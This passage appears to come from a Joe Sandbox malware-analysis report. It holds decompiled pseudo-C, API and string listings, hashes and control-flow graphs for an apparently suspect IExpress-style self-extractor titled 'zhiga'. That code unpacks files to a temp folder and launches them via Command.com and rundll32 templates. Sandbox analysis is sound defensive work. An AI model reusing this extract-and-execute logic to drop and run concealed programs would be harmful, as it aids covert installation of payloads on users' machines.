                                                          									__eflags = _t118 & 0x00000002;
                                                          									if((_t118 & 0x00000002) == 0) {
                                                          										goto L62;
                                                          									}
                                                          									_t140 = "USRQCMD";
                                                          									L20:
                                                          									_t146 =  &_v276;
                                                          									if(E0109468F(_t140,  &_v276, 0x104) == 0) {
                                                          										goto L25;
                                                          									}
                                                          									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                          										_t153 = 1;
                                                          										_v388 = 1;
                                                          									}
                                                          									goto L23;
                                                          								}
                                                          								_t140 = "ADMQCMD";
                                                          								goto L20;
                                                          							}
                                                          						}
                                                          						L26:
                                                          						_push(_t130);
                                                          						_t146 = 0x104;
                                                          						E01091781( &_v276, 0x104, _t130, 0x1098c42);
                                                          						goto L27;
                                                          					}
                                                          				}
                                                          				_t130 = "REBOOT";
                                                          				_t125 = E0109468F(_t130, 0x1099a2c, 4);
                                                          				if(_t125 == 0 || _t125 > 4) {
                                                          					goto L25;
                                                          				} else {
                                                          					goto L3;
                                                          				}
                                                          			}





























































                                                          0x01093baa
                                                          0x01093bb0
                                                          0x01093bb7
                                                          0x01093bc0
                                                          0x01093bc2
                                                          0x01093bc9
                                                          0x01093bcb
                                                          0x01093bcf
                                                          0x01093bd3
                                                          0x01093bd9
                                                          0x01093bfd
                                                          0x01093bfd
                                                          0x01093bff
                                                          0x01093c03
                                                          0x01093c03
                                                          0x01093c11
                                                          0x01093c16
                                                          0x01093c19
                                                          0x01093c28
                                                          0x00000000
                                                          0x00000000
                                                          0x01093c30
                                                          0x01093c39
                                                          0x01093c40
                                                          0x01093d13
                                                          0x01093d15
                                                          0x01093d21
                                                          0x01093d26
                                                          0x00000000
                                                          0x01093c4f
                                                          0x01093c56
                                                          0x01093c60
                                                          0x01093c65
                                                          0x01093c77
                                                          0x01093c78
                                                          0x01093c7c
                                                          0x01093c7e
                                                          0x01093c82
                                                          0x01093c82
                                                          0x00000000
                                                          0x01093c7c
                                                          0x01093c67
                                                          0x01093c69
                                                          0x01093c6d
                                                          0x00000000
                                                          0x01093c58
                                                          0x01093c58
                                                          0x01093c6e
                                                          0x01093c6e
                                                          0x01093c87
                                                          0x01093c89
                                                          0x01093d4d
                                                          0x01093d4f
                                                          0x01093d50
                                                          0x01093d52
                                                          0x01093d9e
                                                          0x01093da8
                                                          0x01093daf
                                                          0x01093db4
                                                          0x01093db6
                                                          0x01093f4d
                                                          0x01093f4d
                                                          0x01093f4f
                                                          0x01093f56
                                                          0x01093f57
                                                          0x01093f58
                                                          0x01093f63
                                                          0x01093f63
                                                          0x01093dbc
                                                          0x01093dc0
                                                          0x01093dc2
                                                          0x01093de6
                                                          0x01093de6
                                                          0x01093de8
                                                          0x01093f0b
                                                          0x01093f0b
                                                          0x01093f0f
                                                          0x01093f13
                                                          0x01093f15
                                                          0x01093f1a
                                                          0x01093f1c
                                                          0x01093f46
                                                          0x01093f47
                                                          0x00000000
                                                          0x01093f47
                                                          0x01093f1e
                                                          0x01093f1f
                                                          0x01093f25
                                                          0x01093f26
                                                          0x01093f2a
                                                          0x01093f2d
                                                          0x01093fd9
                                                          0x01093fd9
                                                          0x01093fda
                                                          0x01093fda
                                                          0x01093fe1
                                                          0x01093fe3
                                                          0x01093fe3
                                                          0x01093fe8
                                                          0x00000000
                                                          0x01093fe8
                                                          0x01093f33
                                                          0x01093f37
                                                          0x00000000
                                                          0x01093f37
                                                          0x01093dee
                                                          0x01093dee
                                                          0x01093df5
                                                          0x01093fad
                                                          0x01093fb9
                                                          0x01093fc2
                                                          0x01093fc8
                                                          0x00000000
                                                          0x01093fc8
                                                          0x01093dfb
                                                          0x01093dfd
                                                          0x00000000
                                                          0x00000000
                                                          0x01093e03
                                                          0x01093e0a
                                                          0x00000000
                                                          0x00000000
                                                          0x01093e15
                                                          0x01093e17
                                                          0x01093e19
                                                          0x01093f94
                                                          0x01093fa4
                                                          0x01093f7c
                                                          0x01093f80
                                                          0x01093f8b
                                                          0x00000000
                                                          0x01093f8b
                                                          0x01093e2c
                                                          0x01093e30
                                                          0x01093e34
                                                          0x01093e36
                                                          0x01093f69
                                                          0x01093f6e
                                                          0x01093f70
                                                          0x01093f76
                                                          0x00000000
                                                          0x01093f76
                                                          0x01093e3c
                                                          0x01093e43
                                                          0x01093e47
                                                          0x01093e52
                                                          0x01093e56
                                                          0x01093e5c
                                                          0x01093e61
                                                          0x01093e68
                                                          0x01093e70
                                                          0x01093e74
                                                          0x01093e7c
                                                          0x01093e80
                                                          0x01093e82
                                                          0x01093e82
                                                          0x01093e87
                                                          0x01093e87
                                                          0x01093e8b
                                                          0x01093e91
                                                          0x01093e94
                                                          0x01093e96
                                                          0x01093e96
                                                          0x01093e9b
                                                          0x01093e9b
                                                          0x01093e9f
                                                          0x01093ea2
                                                          0x01093ea4
                                                          0x01093ea4
                                                          0x01093ea9
                                                          0x01093ea9
                                                          0x01093ead
                                                          0x01093eb3
                                                          0x01093eb6
                                                          0x01093eb8
                                                          0x01093eb8
                                                          0x01093ebd
                                                          0x01093ebd
                                                          0x01093ec1
                                                          0x01093ec3
                                                          0x01093ec5
                                                          0x01093ec5
                                                          0x01093eca
                                                          0x01093eca
                                                          0x01093ece
                                                          0x01093ed5
                                                          0x01093ed9
                                                          0x01093ee0
                                                          0x01093ee6
                                                          0x01093eea
                                                          0x01093eec
                                                          0x01093eee
                                                          0x01093ef3
                                                          0x01093ef3
                                                          0x01093ef5
                                                          0x01093efa
                                                          0x01093efb
                                                          0x01093efd
                                                          0x01093f40
                                                          0x00000000
                                                          0x01093eff
                                                          0x01093eff
                                                          0x01093f05
                                                          0x00000000
                                                          0x01093f05
                                                          0x01093efd
                                                          0x01093dc7
                                                          0x01093dce
                                                          0x00000000
                                                          0x00000000
                                                          0x01093dd0
                                                          0x01093dd7
                                                          0x00000000
                                                          0x00000000
                                                          0x01093dd9
                                                          0x01093ddb
                                                          0x00000000
                                                          0x00000000
                                                          0x01093ddd
                                                          0x01093de1
                                                          0x00000000
                                                          0x01093de1
                                                          0x01093d59
                                                          0x01093d65
                                                          0x01093d6a
                                                          0x01093d6c
                                                          0x00000000
                                                          0x00000000
                                                          0x01093d6e
                                                          0x01093d75
                                                          0x00000000
                                                          0x00000000
                                                          0x01093d8f
                                                          0x01093d96
                                                          0x01093d98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01093d98
                                                          0x01093c8f
                                                          0x01093c98
                                                          0x01093cf1
                                                          0x01093cf3
                                                          0x00000000
                                                          0x00000000
                                                          0x01093cfe
                                                          0x01093d11
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01093d11
                                                          0x01093c9c
                                                          0x01093ca5
                                                          0x01093ca7
                                                          0x00000000
                                                          0x00000000
                                                          0x01093cad
                                                          0x01093cb2
                                                          0x01093cb7
                                                          0x01093cc5
                                                          0x00000000
                                                          0x00000000
                                                          0x01093ce8
                                                          0x01093cec
                                                          0x01093ced
                                                          0x01093ced
                                                          0x00000000
                                                          0x01093ce8
                                                          0x01093c9e
                                                          0x00000000
                                                          0x01093c9e
                                                          0x01093c56
                                                          0x01093d35
                                                          0x01093d35
                                                          0x01093d3c
                                                          0x01093d48
                                                          0x00000000
                                                          0x01093d48
                                                          0x01093c03
                                                          0x01093be2
                                                          0x01093be7
                                                          0x01093bee
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • memset.MSVCRT ref: 01093C11
                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 01093CDC
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,01098C42), ref: 01093D8F
                                                          • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 01093E26
                                                          • FreeLibrary.KERNEL32(00000000,?,01098C42), ref: 01093EFF
                                                          • LocalFree.KERNEL32(?,?,?,?,01098C42), ref: 01093F1F
                                                          • FreeLibrary.KERNEL32(00000000,?,01098C42), ref: 01093F40
                                                          • LocalFree.KERNEL32(?,?,?,?,01098C42), ref: 01093F47
                                                          • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,01098C42), ref: 01093F76
                                                          • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,01098C42), ref: 01093F80
                                                          • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,01098C42), ref: 01093FC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                          • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$zhiga
                                                          • API String ID: 1032054927-520995012
                                                          • Opcode ID: 928438a335adb94c5b4f0adf845605f7a3830888952500c76b0f2b1e4d92f22d
                                                          • Instruction ID: 8882e38562ba6b0442406df992e850cd2fbe2a13ae9b500486c4c47e5ebc8905
                                                          • Opcode Fuzzy Hash: 928438a335adb94c5b4f0adf845605f7a3830888952500c76b0f2b1e4d92f22d
                                                          • Instruction Fuzzy Hash: DDB1E4B06083019BEF70AF38947576B7AE4FB84714F00495DFAD5DA290D7798800EF96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 141 1091ae8-1091b2c call 1091680 144 1091b3b-1091b40 141->144 145 1091b2e-1091b39 141->145 146 1091b46-1091b61 call 1091a84 144->146 145->146 149 1091b9f-1091bc2 call 1091781 call 109658a 146->149 150 1091b63-1091b65 146->150 159 1091bc7-1091bd3 call 10966c8 149->159 152 1091b68-1091b6d 150->152 152->152 154 1091b6f-1091b74 152->154 154->149 156 1091b76-1091b7b 154->156 157 1091b7d-1091b81 156->157 158 1091b83-1091b86 156->158 157->158 160 1091b8c-1091b9d call 1091680 157->160 158->149 161 1091b88-1091b8a 158->161 166 1091bd9-1091bf1 CompareStringA 159->166 167 1091d73-1091d7f call 10966c8 159->167 160->159 161->149 161->160 166->167 168 1091bf7-1091c07 GetFileAttributesA 166->168 174 1091df8-1091e09 LocalAlloc 167->174 175 1091d81-1091d99 CompareStringA 167->175 171 1091c0d-1091c15 168->171 172 1091d53-1091d5e 168->172 171->172 173 1091c1b-1091c33 call 1091a84 171->173 176 1091d64-1091d6e call 10944b9 172->176 187 1091c50-1091c61 LocalAlloc 173->187 188 1091c35-1091c38 173->188 179 1091e0b-1091e1b GetFileAttributesA 174->179 180 1091dd4-1091ddf 174->180 175->174 178 1091d9b-1091da2 175->178 192 1091e94-1091ea4 call 1096ce0 176->192 183 1091da5-1091daa 178->183 184 1091e1d-1091e1f 179->184 185 1091e67-1091e73 call 1091680 179->185 180->176 183->183 189 1091dac-1091db4 183->189 184->185 191 1091e21-1091e3e call 1091781 184->191 197 1091e78-1091e84 call 1092aac 185->197 187->180 196 1091c67-1091c72 187->196 193 1091c3a 188->193 194 1091c40-1091c4b call 1091a84 188->194 195 1091db7-1091dbc 189->195 191->197 207 1091e40-1091e43 191->207 193->194 194->187 195->195 202 1091dbe-1091dd2 LocalAlloc 195->202 203 1091c79-1091cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->203 204 1091c74 196->204 211 1091e89-1091e92 197->211 202->180 208 1091de1-1091df3 call 109171e 202->208 209 1091cf8-1091d07 203->209 210 1091cc2-1091ccc 203->210 204->203 207->197 212 1091e45-1091e65 call 10916b3 * 2 207->212 208->211 213 1091d09-1091d21 GetShortPathNameA 209->213 214 1091d23 209->214 216 1091cce 210->216 217 1091cd3-1091cf3 call 1091680 * 2 210->217 211->192 212->197 219 1091d28-1091d2b 213->219 214->219 216->217 217->211 223 1091d2d 219->223 224 1091d32-1091d4e call 109171e 219->224 223->224 224->211
                                                          C-Code - Quality: 82%
                                                          			E01091AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v527;
                                                          				char _v528;
                                                          				char _v1552;
                                                          				CHAR* _v1556;
                                                          				int* _v1560;
                                                          				CHAR** _v1564;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t48;
                                                          				CHAR* _t53;
                                                          				CHAR* _t54;
                                                          				char* _t57;
                                                          				char* _t58;
                                                          				CHAR* _t60;
                                                          				void* _t62;
                                                          				signed char _t65;
                                                          				intOrPtr _t76;
                                                          				intOrPtr _t77;
                                                          				unsigned int _t85;
                                                          				CHAR* _t90;
                                                          				CHAR* _t92;
                                                          				char _t105;
                                                          				char _t106;
                                                          				CHAR** _t111;
                                                          				CHAR* _t115;
                                                          				intOrPtr* _t125;
                                                          				void* _t126;
                                                          				CHAR* _t132;
                                                          				CHAR* _t135;
                                                          				void* _t138;
                                                          				void* _t139;
                                                          				void* _t145;
                                                          				intOrPtr* _t146;
                                                          				char* _t148;
                                                          				CHAR* _t151;
                                                          				void* _t152;
                                                          				CHAR* _t155;
                                                          				CHAR* _t156;
                                                          				void* _t157;
                                                          				signed int _t158;
                                                          
                                                          				_t48 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t48 ^ _t158;
                                                          				_t108 = __ecx;
                                                          				_v1564 = _a4;
                                                          				_v1560 = _a8;
                                                          				E01091680( &_v528, 0x104, __ecx);
                                                          				if(_v528 != 0x22) {
                                                          					_t135 = " ";
                                                          					_t53 =  &_v528;
                                                          				} else {
                                                          					_t135 = "\"";
                                                          					_t53 =  &_v527;
                                                          				}
                                                          				_t111 =  &_v1556;
                                                          				_v1556 = _t53;
                                                          				_t54 = E01091A84(_t111, _t135);
                                                          				_t156 = _v1556;
                                                          				_t151 = _t54;
                                                          				if(_t156 == 0) {
                                                          					L12:
                                                          					_push(_t111);
                                                          					E01091781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          					E0109658A( &_v268, 0x104, _t156);
                                                          					goto L13;
                                                          				} else {
                                                          					_t132 = _t156;
                                                          					_t148 =  &(_t132[1]);
                                                          					do {
                                                          						_t105 =  *_t132;
                                                          						_t132 =  &(_t132[1]);
                                                          					} while (_t105 != 0);
                                                          					_t111 = _t132 - _t148;
                                                          					if(_t111 < 3) {
                                                          						goto L12;
                                                          					}
                                                          					_t106 = _t156[1];
                                                          					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                          						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                          							goto L12;
                                                          						} else {
                                                          							goto L11;
                                                          						}
                                                          					} else {
                                                          						L11:
                                                          						E01091680( &_v268, 0x104, _t156);
                                                          						L13:
                                                          						_t138 = 0x2e;
                                                          						_t57 = E010966C8(_t156, _t138);
                                                          						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                          							_t139 = 0x2e;
                                                          							_t115 = _t156;
                                                          							_t58 = E010966C8(_t115, _t139);
                                                          							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                          								_t156 = LocalAlloc(0x40, 0x400);
                                                          								if(_t156 == 0) {
                                                          									goto L43;
                                                          								}
                                                          								_t65 = GetFileAttributesA( &_v268); // executed
                                                          								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                          									E01091680( &_v1552, 0x400, _t108);
                                                          								} else {
                                                          									_push(_t115);
                                                          									_t108 = 0x400;
                                                          									E01091781( &_v1552, 0x400, _t115,  &_v268);
                                                          									if(_t151 != 0 &&  *_t151 != 0) {
                                                          										E010916B3( &_v1552, 0x400, " ");
                                                          										E010916B3( &_v1552, 0x400, _t151);
                                                          									}
                                                          								}
                                                          								_t140 = _t156;
                                                          								 *_t156 = 0;
                                                          								E01092AAC( &_v1552, _t156, _t156);
                                                          								goto L53;
                                                          							} else {
                                                          								_t108 = "Command.com /c %s";
                                                          								_t125 = "Command.com /c %s";
                                                          								_t145 = _t125 + 1;
                                                          								do {
                                                          									_t76 =  *_t125;
                                                          									_t125 = _t125 + 1;
                                                          								} while (_t76 != 0);
                                                          								_t126 = _t125 - _t145;
                                                          								_t146 =  &_v268;
                                                          								_t157 = _t146 + 1;
                                                          								do {
                                                          									_t77 =  *_t146;
                                                          									_t146 = _t146 + 1;
                                                          								} while (_t77 != 0);
                                                          								_t140 = _t146 - _t157;
                                                          								_t154 = _t126 + 8 + _t146 - _t157;
                                                          								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                          								if(_t156 != 0) {
                                                          									E0109171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                          									goto L53;
                                                          								}
                                                          								goto L43;
                                                          							}
                                                          						} else {
                                                          							_t85 = GetFileAttributesA( &_v268);
                                                          							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                          								_t140 = 0x525;
                                                          								_push(0);
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_t60 =  &_v268;
                                                          								goto L35;
                                                          							} else {
                                                          								_t140 = "[";
                                                          								_v1556 = _t151;
                                                          								_t90 = E01091A84( &_v1556, "[");
                                                          								if(_t90 != 0) {
                                                          									if( *_t90 != 0) {
                                                          										_v1556 = _t90;
                                                          									}
                                                          									_t140 = "]";
                                                          									E01091A84( &_v1556, "]");
                                                          								}
                                                          								_t156 = LocalAlloc(0x40, 0x200);
                                                          								if(_t156 == 0) {
                                                          									L43:
                                                          									_t60 = 0;
                                                          									_t140 = 0x4b5;
                                                          									_push(0);
                                                          									_push(0x10);
                                                          									_push(0);
                                                          									L35:
                                                          									_push(_t60);
                                                          									E010944B9(0, _t140);
                                                          									_t62 = 0;
                                                          									goto L54;
                                                          								} else {
                                                          									_t155 = _v1556;
                                                          									_t92 = _t155;
                                                          									if( *_t155 == 0) {
                                                          										_t92 = "DefaultInstall";
                                                          									}
                                                          									 *0x1099120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                          									 *_v1560 = 1;
                                                          									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1091140, _t156, 8,  &_v268) == 0) {
                                                          										 *0x1099a34 =  *0x1099a34 & 0xfffffffb;
                                                          										if( *0x1099a40 != 0) {
                                                          											_t108 = "setupapi.dll";
                                                          										} else {
                                                          											_t108 = "setupx.dll";
                                                          											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                          										}
                                                          										if( *_t155 == 0) {
                                                          											_t155 = "DefaultInstall";
                                                          										}
                                                          										_push( &_v268);
                                                          										_push(_t155);
                                                          										E0109171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                          									} else {
                                                          										 *0x1099a34 =  *0x1099a34 | 0x00000004;
                                                          										if( *_t155 == 0) {
                                                          											_t155 = "DefaultInstall";
                                                          										}
                                                          										E01091680(_t108, 0x104, _t155);
                                                          										_t140 = 0x200;
                                                          										E01091680(_t156, 0x200,  &_v268);
                                                          									}
                                                          									L53:
                                                          									_t62 = 1;
                                                          									 *_v1564 = _t156;
                                                          									L54:
                                                          									_pop(_t152);
                                                          									return E01096CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}














































                                                          0x01091af3
                                                          0x01091afa
                                                          0x01091b07
                                                          0x01091b09
                                                          0x01091b1a
                                                          0x01091b20
                                                          0x01091b2c
                                                          0x01091b3b
                                                          0x01091b40
                                                          0x01091b2e
                                                          0x01091b2e
                                                          0x01091b33
                                                          0x01091b33
                                                          0x01091b46
                                                          0x01091b4c
                                                          0x01091b52
                                                          0x01091b57
                                                          0x01091b5d
                                                          0x01091b61
                                                          0x01091b9f
                                                          0x01091b9f
                                                          0x01091bb1
                                                          0x01091bc2
                                                          0x00000000
                                                          0x01091b63
                                                          0x01091b63
                                                          0x01091b65
                                                          0x01091b68
                                                          0x01091b68
                                                          0x01091b6a
                                                          0x01091b6b
                                                          0x01091b6f
                                                          0x01091b74
                                                          0x00000000
                                                          0x00000000
                                                          0x01091b76
                                                          0x01091b7b
                                                          0x01091b86
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01091b8c
                                                          0x01091b8c
                                                          0x01091b98
                                                          0x01091bc7
                                                          0x01091bc9
                                                          0x01091bcc
                                                          0x01091bd3
                                                          0x01091d75
                                                          0x01091d76
                                                          0x01091d78
                                                          0x01091d7f
                                                          0x01091e05
                                                          0x01091e09
                                                          0x00000000
                                                          0x00000000
                                                          0x01091e12
                                                          0x01091e1b
                                                          0x01091e73
                                                          0x01091e21
                                                          0x01091e21
                                                          0x01091e28
                                                          0x01091e37
                                                          0x01091e3e
                                                          0x01091e52
                                                          0x01091e60
                                                          0x01091e60
                                                          0x01091e3e
                                                          0x01091e79
                                                          0x01091e7b
                                                          0x01091e84
                                                          0x00000000
                                                          0x01091d9b
                                                          0x01091d9b
                                                          0x01091da0
                                                          0x01091da2
                                                          0x01091da5
                                                          0x01091da5
                                                          0x01091da7
                                                          0x01091da8
                                                          0x01091dac
                                                          0x01091dae
                                                          0x01091db4
                                                          0x01091db7
                                                          0x01091db7
                                                          0x01091db9
                                                          0x01091dba
                                                          0x01091dbe
                                                          0x01091dc3
                                                          0x01091dce
                                                          0x01091dd2
                                                          0x01091deb
                                                          0x00000000
                                                          0x01091df0
                                                          0x00000000
                                                          0x01091dd2
                                                          0x01091bf7
                                                          0x01091bfe
                                                          0x01091c07
                                                          0x01091d55
                                                          0x01091d5a
                                                          0x01091d5b
                                                          0x01091d5d
                                                          0x01091d5e
                                                          0x00000000
                                                          0x01091c1b
                                                          0x01091c1b
                                                          0x01091c20
                                                          0x01091c2c
                                                          0x01091c33
                                                          0x01091c38
                                                          0x01091c3a
                                                          0x01091c3a
                                                          0x01091c40
                                                          0x01091c4b
                                                          0x01091c4b
                                                          0x01091c5d
                                                          0x01091c61
                                                          0x01091dd4
                                                          0x01091dd4
                                                          0x01091dd6
                                                          0x01091ddb
                                                          0x01091ddc
                                                          0x01091dde
                                                          0x01091d64
                                                          0x01091d64
                                                          0x01091d67
                                                          0x01091d6c
                                                          0x00000000
                                                          0x01091c67
                                                          0x01091c67
                                                          0x01091c6d
                                                          0x01091c72
                                                          0x01091c74
                                                          0x01091c74
                                                          0x01091c8e
                                                          0x01091c99
                                                          0x01091cc0
                                                          0x01091cf8
                                                          0x01091d07
                                                          0x01091d23
                                                          0x01091d09
                                                          0x01091d14
                                                          0x01091d1b
                                                          0x01091d1b
                                                          0x01091d2b
                                                          0x01091d2d
                                                          0x01091d2d
                                                          0x01091d38
                                                          0x01091d39
                                                          0x01091d46
                                                          0x01091cc2
                                                          0x01091cc2
                                                          0x01091ccc
                                                          0x01091cce
                                                          0x01091cce
                                                          0x01091cdb
                                                          0x01091ce6
                                                          0x01091cee
                                                          0x01091cee
                                                          0x01091e89
                                                          0x01091e91
                                                          0x01091e92
                                                          0x01091e94
                                                          0x01091e97
                                                          0x01091ea4
                                                          0x01091ea4
                                                          0x01091c61
                                                          0x01091c07
                                                          0x01091bd3
                                                          0x01091b7b

                                                          APIs
                                                          • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01091BE7
                                                          • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01091BFE
                                                          • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01091C57
                                                          • GetPrivateProfileIntA.KERNEL32 ref: 01091C88
                                                          • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,01091140,00000000,00000008,?), ref: 01091CB8
                                                          • GetShortPathNameA.KERNEL32 ref: 01091D1B
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                          • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                          • API String ID: 383838535-2869639027
                                                          • Opcode ID: 31a1495d453c88f823dd1052db4722443735e7034d927fea75c94bd974d3278c
                                                          • Instruction ID: 93f18bef850c0bd014b17b6ffa77520aea88c79e9fc20a9ec90df018fdfd5c87
                                                          • Opcode Fuzzy Hash: 31a1495d453c88f823dd1052db4722443735e7034d927fea75c94bd974d3278c
                                                          • Instruction Fuzzy Hash: 4AA16EB0B0020B6BEF61AB28CC74BEA77A9AB55330F1442D9E5D5A32C0DB758D85DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 406 1092f1d-1092f3d 407 1092f6c-1092f73 call 1095164 406->407 408 1092f3f-1092f46 406->408 416 1092f79-1092f80 call 10955a0 407->416 417 1093041 407->417 410 1092f48 call 10951e5 408->410 411 1092f5f-1092f66 call 1093a3f 408->411 418 1092f4d-1092f4f 410->418 411->407 411->417 416->417 424 1092f86-1092fbe GetSystemDirectoryA call 109658a LoadLibraryA 416->424 420 1093043-1093053 call 1096ce0 417->420 418->417 421 1092f55-1092f5d 418->421 421->407 421->411 428 1092fc0-1092fd4 GetProcAddress 424->428 429 1092ff7-1093004 FreeLibrary 424->429 428->429 432 1092fd6-1092fee DecryptFileA 428->432 430 1093017-1093024 SetCurrentDirectoryA 429->430 431 1093006-109300c 429->431 434 1093054-109305a 430->434 435 1093026-109303c call 10944b9 call 1096285 430->435 431->430 433 109300e call 109621e 431->433 432->429 441 1092ff0-1092ff5 432->441 445 1093013-1093015 433->445 436 109305c call 1093b26 434->436 437 1093065-109306c 434->437 435->417 447 1093061-1093063 436->447 443 109307c-1093089 437->443 444 109306e-1093075 call 109256d 437->444 441->429 449 109308b-1093091 443->449 450 10930a1-10930a9 443->450 452 109307a 444->452 445->417 445->430 447->417 447->437 449->450 453 1093093 call 1093ba2 449->453 455 10930ab-10930ad 450->455 456 10930b4-10930b7 450->456 452->443 460 1093098-109309a 453->460 455->456 457 10930af call 1094169 455->457 456->420 457->456 460->417 461 109309c 460->461 461->450
                                                          C-Code - Quality: 82%
                                                          			E01092F1D(void* __ecx, int __edx) {
                                                          				signed int _v8;
                                                          				char _v272;
                                                          				_Unknown_base(*)()* _v276;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t9;
                                                          				void* _t11;
                                                          				struct HWND__* _t12;
                                                          				void* _t14;
                                                          				int _t21;
                                                          				signed int _t22;
                                                          				signed int _t25;
                                                          				intOrPtr* _t26;
                                                          				signed int _t27;
                                                          				void* _t30;
                                                          				_Unknown_base(*)()* _t31;
                                                          				void* _t34;
                                                          				struct HINSTANCE__* _t36;
